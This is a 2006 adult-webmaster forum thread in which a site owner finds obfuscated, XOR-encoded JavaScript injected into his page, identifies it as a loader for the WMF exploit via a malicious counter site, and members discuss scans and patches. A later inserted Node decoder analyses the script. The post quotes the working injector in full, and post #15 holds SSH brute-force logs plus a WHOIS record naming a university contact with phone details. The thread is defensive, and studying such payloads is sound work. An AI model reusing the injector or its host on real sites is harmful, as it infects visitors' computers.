Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

Old 01-03-2006, 05:37 AM   #1
DutchTeenCash
I like Dutch Girls
 
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
Weird JavaScript suddenly on page [pls help]

uploaded a new index on dutchteenamateurs and suddenly this is on the site

<sc-ript language="JavaScript">
e = '0x00' + '5E';str1 = "%E5%BD%B6%AB%C1%AC%AD%A6%B5%BA%E2%FF%AB%B6%AC%B6% BF%B6%B5%B6%AD%A6%E7%B9%B6%BD%BD%BA%B3%FF%E3%E5%B6 %BB%AF%BE%B2%BA%C1%AC%AF%BC%E2%FF%B9%AD%AD%B1%E7%F 0%F0%AA%AC%BA%AF%AC%BC%B0%AA%B3%AD%BA%AF%F3%BC%B0% B2%F0%B3%AD%AF%BE%BB%F0%FF%C1%A8%B6%BD%AD%B9%E2%EE %C1%B9%BA%B6%B8%B9%AD%E2%EE%E3%E5%F0%B6%BB%AF%BE%B 2%BA%E3%E5%F0%BD%B6%AB%E3%C1%D2%D7";str=tmp='';for (i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
</sc-ript>

WTF is that? it asked for some counter to be installed never added it, gonna scan my PC right now :/
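Added example, not part of the original thread or of any member's post: a static decoder in JavaScript (Node) for the script pasted in post #1. It reads the script as text, recovers the key and the %XX string, and returns the markup the script would have handed to document.write, together with a summary of hidden iframes and defanged URLs. The function names and the sample inputs are illustrative assumptions.

```javascript
// Added example: static decoder for the scheme used by the pasted script.
// Nothing is evaluated or written to a DOM; results are returned as data.

// Constructed sample: the first ten %XX triples of the string in the post,
// with one space placed the way forum line-breaking splits a triple.
const SAMPLE_SCRIPT =
  `e = '0x00' + '5E';str1 = "%E5%BD%B6%AB%C1%AC% AD%A6%B5%BA";`;

// Pull the XOR key and the encoded string out of the script source text.
function extractParts(scriptText) {
  // e = '0x00' + '5E' concatenates to "0x005E", which JavaScript coerces to 94.
  const keyMatch = /\be\s*=\s*((?:'[^']*'\s*\+?\s*)+);/.exec(scriptText);
  const strMatch = /\bstr1\s*=\s*"([^"]*)"/.exec(scriptText);
  if (!keyMatch || !strMatch) throw new Error("script does not use this scheme");
  const key = Number(keyMatch[1].replace(/['+\s]/g, ""));
  if (!Number.isInteger(key)) throw new Error("key is not a number");
  return { key, encoded: strMatch[1] };
}

// Reverse the script's loop: each %XX byte is XORed with the key, then 127 is subtracted.
function decode(encoded, key) {
  const clean = encoded.replace(/\s+/g, ""); // drop spaces added by forum or mail wrapping
  const triples = clean.match(/%[0-9A-Fa-f]{2}/g) || [];
  if (triples.join("") !== clean) throw new Error("payload is not pure %XX triples");
  return triples
    .map((t) => String.fromCharCode((parseInt(t.slice(1), 16) ^ key) - 127))
    .join("");
}

// Describe what decoded markup would inject, without rendering it.
function summarize(html) {
  const attr = /\b(?:src|href)\s*=\s*["']?([^"'\s>]+)/gi;
  return {
    iframes: (html.match(/<iframe\b/gi) || []).length,
    hidden: /visibility\s*:\s*hidden|display\s*:\s*none/i.test(html),
    tiny: /\b(?:width|height)\s*=\s*["']?[01]\b/i.test(html),
    // Defang URLs so the report can be pasted into a ticket safely.
    urls: [...html.matchAll(attr)].map((m) => m[1].replace(/^http/i, "hxxp")),
  };
}

function analyze(scriptText) {
  const { key, encoded } = extractParts(scriptText);
  const html = decode(encoded, key);
  return { key, html, ...summarize(html) };
}

console.log(analyze(SAMPLE_SCRIPT));
```

Run against the full script text saved from an affected page, analyze() reports the decoded markup and any URLs it references without the browser ever loading them.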
Old 01-03-2006, 05:56 AM   #2
DutchTeenCash
I like Dutch Girls
 
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
boinkboink
Old 01-03-2006, 06:11 AM   #3
Doc911
Confirmed User
 
Join Date: Feb 2004
Location: If i was up your ass you'd know
Posts: 3,695
Haven't seen that one before ThinkX. looks similar to what code red was doing. did a virus scan find anything?
__________________


For PHP/MySQL scripts ICQ 161480555 or email [email protected]
Old 01-03-2006, 06:16 AM   #4
Dennis69
Confirmed User
 
Join Date: Feb 2003
Location: Dreamland
Posts: 1,685
I had someone install a counter like that across all my domains just before xmas... had to get my host to do a mass replace
__________________
HaHaHa
Old 01-03-2006, 06:41 AM   #5
mortenb
Confirmed User
 
Join Date: Jul 2004
Location: Denmark ICQ: 7880009
Posts: 2,203
Quote:
Originally Posted by Dennis69
I had someone install a counter like that across all my domains just before xmas... had to get my host to do a mass replace
Yep. That was a fun night!
Old 01-03-2006, 06:59 AM   #6
hjnet
Confirmed User
 
Join Date: May 2002
Location: European Union
Posts: 3,815
Quote:
Originally Posted by Dennis69
I had someone install a counter like that across all my domains just before xmas... had to get my host to do a mass replace
Do you have an idea who it was, or how he did it?
Old 01-03-2006, 07:00 AM   #7
~Ray
visit hardlinks.org
 
Join Date: Jun 2003
Location: Las Vegas , Nv >>> [email protected] or icq 94994627 anytime
Posts: 18,362
Quote:
Originally Posted by hjnet
Do you have an idea who it was, or how he did it?
I'd like to know too... something new to bug my host about.
Old 01-03-2006, 07:03 AM   #8
DutchTeenCash
I like Dutch Girls
 
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
checking with bitdefender found 2 exploits on my c drive, checking every monday so these are new since yday. Love to know what it is as well, they managed to get through BD and Im only surfing in FF
Old 01-03-2006, 07:05 AM   #9
DutchTeenCash
I like Dutch Girls
 
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
it opened hxxp://userscounter.com/ntraf/animation.htm
Old 01-03-2006, 07:07 AM   #10
DutchTeenCash
I like Dutch Girls
 
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
ok tried to open it with BD

c:\......\temp\eqe6x21s.wmf

Exploit.Win32.WMF-PFV
Old 01-03-2006, 07:09 AM   #11
DutchTeenCash
I like Dutch Girls
 
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
Damn Dec28 that didnt take long :/

http://www.bitdefender.us/VIRUS-1736...2.WMF-PFV.html

Exploit.Win32.WMF-PFV
Virus Encyclopedia

Spreading: LOW
Discovered: 2005 Dec 28
Damage: LOW
Size: 16 KB
FREE REMOVAL TOOL : N/A
SYMPTOMS:
Automatic worm or spyware installation, without confirmation.
TECHNICAL DESCRIPTION:
This is a WMF (Windows Meta-File) rendering exploit. The rendering bug that is exploited lies in the Windows Picture and Fax Viewer.

The WMF file could be placed on a web site that the victim visits and gets infected.

The exploit may create a shell on the victim computer, or may download and install a worm or a spyware trojan.

The exploit 'works' on Internet Explorer and some versions of Mozilla. However some browsers may display a confirmation dialog about it.

BitDefender detects this exploit as Exploit.Win32.WMF-PFV.
REMOVAL INSTRUCTIONS:
Please let BitDefender delete detected files.
ANALYZED BY:
BitDefender AntiVirus Lab
Old 01-03-2006, 07:09 AM   #12
Thomas
Confirmed User
 
Join Date: Jul 2002
Location: The Netherlands
Posts: 277
your server might be hacked, i've seen that before.
check other html files if you see the same thing.
Old 01-03-2006, 07:11 AM   #13
DutchTeenCash
I like Dutch Girls
 
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
k found it

I got it through the chameleon window for tgp submission thats IE, some TGP submit page must have it too, it paste the exploit to html pages so the server isnt hacked (checked IP too it isnt)
Old 01-03-2006, 07:12 AM   #14
DutchTeenCash
I like Dutch Girls
 
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
Quote:
Originally Posted by Thomas
your server might be hacked, i've seen that before.
check other html files if you see the same thing.
thanks glad it isnt

offtopic : when are you gonna fix the chameleon submission error stating 3-4 characters minimum at the gallery url? been like that for at least 2 months
Old 01-03-2006, 07:16 AM   #15
DutchTeenCash
I like Dutch Girls
 
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
feck

Jan 3 07:48:18 rhonda sshd[16932]: Failed password for invalid user test from 168.131.82.129 port 39491 ssh2
Jan 3 07:48:22 rhonda sshd[16957]: Invalid user test from 168.131.82.129
Jan 3 07:48:22 rhonda sshd[16957]: error: Could not get shadow information for NOUSER
Jan 3 07:48:22 rhonda sshd[16957]: Failed password for invalid user test from 168.131.82.129 port 39649 ssh2
Jan 3 07:48:25 rhonda sshd[16982]: Invalid user test from 168.131.82.129
Jan 3 07:48:25 rhonda sshd[16982]: error: Could not get shadow information for NOUSER
Jan 3 07:48:25 rhonda sshd[16982]: Failed password for invalid user test from 168.131.82.129 port 39760 ssh2
Jan 3 07:48:29 rhonda sshd[17004]: Invalid user test from 168.131.82.129
Jan 3 07:48:29 rhonda sshd[17004]: error: Could not get shadow information for NOUSER
Jan 3 07:48:29 rhonda sshd[17004]: Failed password for invalid user test from 168.131.82.129 port 39866 ssh2
Jan 3 07:48:33 rhonda sshd[17024]: Invalid user test from 168.131.82.129
Jan 3 07:48:33 rhonda sshd[17024]: error: Could not get shadow information for NOUSER
Jan 3 07:48:33 rhonda sshd[17024]: Failed password for invalid user test from 168.131.82.129 port 39971 ssh2
Jan 3 07:48:37 rhonda sshd[17038]: Invalid user test from 168.131.82.129
Jan 3 07:48:37 rhonda sshd[17038]: error: Could not get shadow information for NOUSER
Jan 3 07:48:37 rhonda sshd[17038]: Failed password for invalid user test from 168.131.82.129 port 40083 ssh2
Jan 3 07:48:41 rhonda sshd[17057]: Invalid user test from 168.131.82.129
Jan 3 07:48:41 rhonda sshd[17057]: error: Could not get shadow information for NOUSER
Jan 3 07:48:41 rhonda sshd[17057]: Failed password for invalid user test from 168.131.82.129 port 40184 ssh2
Jan 3 07:48:45 rhonda sshd[17076]: Invalid user test from 168.131.82.129
Jan 3 07:48:45 rhonda sshd[17076]: error: Could not get shadow information for NOUSER
Jan 3 07:48:45 rhonda sshd[17076]: Failed password for invalid user test from 168.131.82.129 port 40302 ssh2
Jan 3 07:48:49 rhonda sshd[17107]: Invalid user tester from 168.131.82.129
Jan 3 07:48:49 rhonda sshd[17107]: error: Could not get shadow information for NOUSER
Jan 3 07:48:49 rhonda sshd[17107]: Failed password for invalid user tester from 168.131.82.129 port 40449 ssh2
Jan 3 07:48:53 rhonda sshd[17124]: Invalid user tester from 168.131.82.129
Jan 3 07:48:53 rhonda sshd[17124]: error: Could not get shadow information for NOUSER
Jan 3 07:48:53 rhonda sshd[17124]: Failed password for invalid user tester from 168.131.82.129 port 40555 ssh2
Jan 3 07:48:56 rhonda sshd[17142]: Invalid user tester from 168.131.82.129
Jan 3 07:48:56 rhonda sshd[17142]: error: Could not get shadow information for NOUSER
Jan 3 07:48:56 rhonda sshd[17142]: Failed password for invalid user tester from 168.131.82.129 port 40663 ssh2
Jan 3 07:49:00 rhonda sshd[17159]: Invalid user tester from 168.131.82.129
Jan 3 07:49:00 rhonda sshd[17159]: error: Could not get shadow information for NOUSER
Jan 3 07:49:00 rhonda sshd[17159]: Failed password for invalid user tester from 168.131.82.129 port 40773 ssh2
Jan 3 07:49:04 rhonda sshd[17180]: Invalid user tester from 168.131.82.129
Jan 3 07:49:04 rhonda sshd[17180]: error: Could not get shadow information for NOUSER
Jan 3 07:49:04 rhonda sshd[17180]: Failed password for invalid user tester from 168.131.82.129 port 40873 ssh2
Jan 3 07:49:07 rhonda sshd[17245]: Invalid user tester from 168.131.82.129
Jan 3 07:49:07 rhonda sshd[17245]: error: Could not get shadow information for NOUSER
Jan 3 07:49:07 rhonda sshd[17245]: Failed password for invalid user tester from 168.131.82.129 port 40981 ssh2
Jan 3 07:49:11 rhonda sshd[17261]: Invalid user tester from 168.131.82.129
Jan 3 07:49:11 rhonda sshd[17261]: error: Could not get shadow information for NOUSER
Jan 3 07:49:11 rhonda sshd[17261]: Failed password for invalid user tester from 168.131.82.129 port 41086 ssh2
Jan 3 07:49:17 rhonda sshd[17292]: Invalid user tester from 168.131.82.129
Jan 3 07:49:17 rhonda sshd[17292]: error: Could not get shadow information for NOUSER
Jan 3 07:49:17 rhonda sshd[17292]: Failed password for invalid user tester from 168.131.82.129 port 41190 ssh2
Jan 3 07:49:21 rhonda sshd[17318]: Invalid user tester from 168.131.82.129
Jan 3 07:49:21 rhonda sshd[17318]: error: Could not get shadow information for NOUSER
Jan 3 07:49:21 rhonda sshd[17318]: Failed password for invalid user tester from 168.131.82.129 port 41376 ssh2

Location: Korea-KR [City: Seoul, Kyonggi-Do]

ARIN says that this IP belongs to APNIC; I'm looking it up there.

APNIC says that this IP belongs to KRNIC; I'm looking it up there.



한국인터넷진흥원(NIDA)의 인터넷정보센터(KRNIC)가 제공하는 Whois 서비스 입니다.

query: 168.131.82.129

# KOREAN

조회결과는 아래와 같으며, 실제 정보와 상이할 수 있습니다.

IPv4 주소 : 168.131.0.0-168.131.255.255
네트워크 이름 : CHONNAM-NET
할당내역 등록일 : 20040625
할당정보공개여부 : Y

[ IPv4 사용 기관 정보 ]
기관고유번호 : ORG384067
기관명 : 전남대학교
주소 : 광주 북구 용봉동
상세주소 : 300번지 전남대학교 정보전산원
우편 번호 : 500-757

[ 네트워크 담당자 인물 정보 ]
이름 : 조재민
기관명 : 전남대학교
주소 : 광주 북구 용봉동
상세주소 : 300번지 전남대학교 정보전산원
우편 번호 : 500-757
전화 번호 : +82-62-530-3684
전자 우편 : ****@chonnam.ac.kr
Old 01-03-2006, 07:19 AM   #16
Thomas
Confirmed User
 
Join Date: Jul 2002
Location: The Netherlands
Posts: 277
Quote:
Originally Posted by thinkx
thanks glad it isnt

offtopic : when are you gonna fix the chameleon submission error stating 3-4 characters minimum at the gallery url? been like that for at least 2 months
Error?, could be a wrong setting by the webmaster.. Hit me up on icq, I would like to see that.
Old 01-03-2006, 07:19 AM   #17
spacedog
Yes that IS me. Bitch.
 
Join Date: Nov 2001
Posts: 14,149
Quote:
Originally Posted by thinkx
it opened hxxp://userscounter.com/ntraf/animation.htm
That's the piece of shit counter that loaded on me when I went to visit amacontent site.. I icq'd him to tell him about it.. it downloads trojans on users pc.. good thing I had norton on.. my IE6 got frozen, couldnt close windows & it used up resources like a motherfucker..
Old 01-03-2006, 07:23 AM   #18
DutchTeenCash
I like Dutch Girls
 
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
Quote:
Originally Posted by spacedog
That's the piece of shit counter that loaded on me when I went to visit amacontent site.. I icq'd him to tell him about it.. it downloads trojans on users pc.. good thing I had norton on.. my IE6 got frozen, couldnt close windows & it used up resources like a motherfucker..
yeah its only in IE ive got 5 though, its gone now, update your AV cause mine didnt get it till today... it dl a trojan yes an exploit that pastes the JS code
Old 01-03-2006, 08:18 AM   #19
sinnerscorner
Confirmed User
 
Join Date: Jul 2004
Posts: 194
More about this at: http://www.f-secure.com/weblog/

I am just wondering are MGP's getting less clicks to their movie
galleries now as this seems to be a major exploit. And what are
the MGP reviewers using to not get infected by this.

There is a temporary Non Micro$oft Patch at
http://www.hexblog.com/
__________________
-- ok there is no sig here --
Old 01-03-2006, 08:29 AM   #20
DutchTeenCash
I like Dutch Girls
 
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
thanks, yeah lotsa ppl wont know till they find out weeks later i think
Old 01-03-2006, 08:34 AM   #21
hjnet
Confirmed User
 
Join Date: May 2002
Location: European Union
Posts: 3,815
DoubleBump

Very interesting thread, so everybody should read it to avoid that shit like this spreads any further!
Old 01-06-2006, 08:25 AM   #22
dziggy
Registered User
 
Join Date: Sep 2005
Posts: 68
Quote:
Originally Posted by sinnerscorner
I am just wondering are MGP's getting less clicks to their movie galleries now as this seems to be a major exploit. And what are the MGP reviewers using to not get infected by this.
They should not use IE at least. Not now, not ever

There is a really good browser here I recommend: http://www.maxthon.com
__________________

ICQ# 305827231
Old 01-06-2006, 08:48 AM   #23
sinnerscorner
Confirmed User
 
Join Date: Jul 2004
Posts: 194
I believe this exploit is browser independent. Anyway there is an
official micro$oft patch out as of today.
__________________
-- ok there is no sig here --
Old 01-06-2006, 09:34 AM   #24
DutchTeenCash
I like Dutch Girls
 
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
Quote:
Originally Posted by sinnerscorner
I believe this exploit is browser independent. Anyway there is an
official micro$oft patch out as of today.
there is I know thanks